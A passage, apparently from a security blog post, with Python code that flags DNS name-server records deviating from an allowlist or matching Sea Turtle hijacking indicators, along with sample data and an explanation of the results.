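                       expected_ns: Dict[str, Set[str]]) -> List[Finding]:
    """Flag NS records that deviate from the allowlist and any record that
    points at a listed Sea Turtle name server or IP address."""
    ioc_ns = {normalize_name(d) for d in SEA_TURTLE_NS_DOMAINS}
    allow = {normalize_name(zone): {normalize_name(h) for h in hosts}
             for zone, hosts in expected_ns.items()}
    findings: List[Finding] = []
    for obs in observations:
        owner = normalize_name(obs.owner)
        rdata = normalize_name(obs.rdata)
        rtype = obs.rtype.upper()
        if rtype == "NS":
            # A name server outside the allowlist is the hijack signature
            # described in the post, whether or not it is a known IoC.
            if owner in allow and rdata not in allow[owner]:
                findings.append(Finding(owner, rtype, rdata, obs.source, "unexpected_ns"))
            if rdata in ioc_ns:
                findings.append(Finding(owner, rtype, rdata, obs.source, "ioc_ns_domain"))
        elif rtype == "A":
            try:
                ip = str(ipaddress.ip_address(rdata))
            except ValueError:
                continue  # malformed rdata in the feed; skip rather than crash
            if ip in SEA_TURTLE_IPS:
                findings.append(Finding(owner, rtype, ip, obs.source, "ioc_ip"))
    return findings


# Constructed sample data: one monitored zone and a handful of observations,
# some current ("live") and some historical ("pdns").
EXPECTED_NS = {"example.com": {"ns1.example-dns.net", "ns2.example-dns.net"}}

SAMPLE_OBSERVATIONS = [
    DnsObservation("example.com.", "NS", "ns1.example-dns.net.", "live"),
    DnsObservation("example.com.", "NS", "ns2.example-dns.net.", "live"),
    DnsObservation("example.com.", "NS", "ns1.intersecdns.com.", "pdns"),
    DnsObservation("vpn.example.com.", "A", "95.179.150.101", "pdns"),
    DnsObservation("www.example.com.", "A", "203.0.113.10", "live"),
    DnsObservation("mail.example.com.", "A", "not-an-ip", "pdns"),
]

if __name__ == "__main__":
    for f in check_observations(SAMPLE_OBSERVATIONS, EXPECTED_NS):
        print(f"{f.reason:14} {f.source:5} {f.owner} {f.rtype} {f.rdata}")
```

Run against the sample data this reports the historical NS record pointing at `ns1.intersecdns.com` twice (once as an allowlist deviation, once as a known indicator) and the `vpn` A record resolving to the actor name-server IP, while ignoring the benign and malformed rows. In practice the `SAMPLE_OBSERVATIONS` list would be replaced by records pulled from a passive DNS provider or from a scheduled resolver query, and the allowlist deviation is the check worth keeping even after the listed indicators go stale, since the VPS addresses have since been resold.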